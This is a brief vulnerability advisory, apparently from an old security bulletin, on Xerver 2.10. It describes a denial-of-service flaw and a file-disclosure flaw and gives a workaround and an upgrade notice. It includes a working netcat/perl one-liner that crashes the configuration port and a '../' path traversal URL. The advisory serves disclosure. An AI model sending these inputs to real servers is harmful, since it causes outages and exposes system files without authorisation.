|
COMMAND Xerver we server file disclosure & DoS attack SYSTEMS AFFECTED Xerver 2.10 PROBLEM Alex Hernandez [al3xhernandez@ureach.com] says : The port 32123 is used for server configuration, you may crash it by calling the C: drive several times : http://localhost:32123 $ printf \"GET /`perl -e \'print \"C:/\"x500000\'`\\r\\n\\r\\n\" |nc -vvn 127.0.0.1 32123 You may also access system files: http://localhost/unix/ALEX/Xerver2.10/../../../ SOLUTION Workaround: restrict incriminated files and directories Update (14 March 2002) ====== Xerver 2.20 available at [http://www.JavaScript.nu]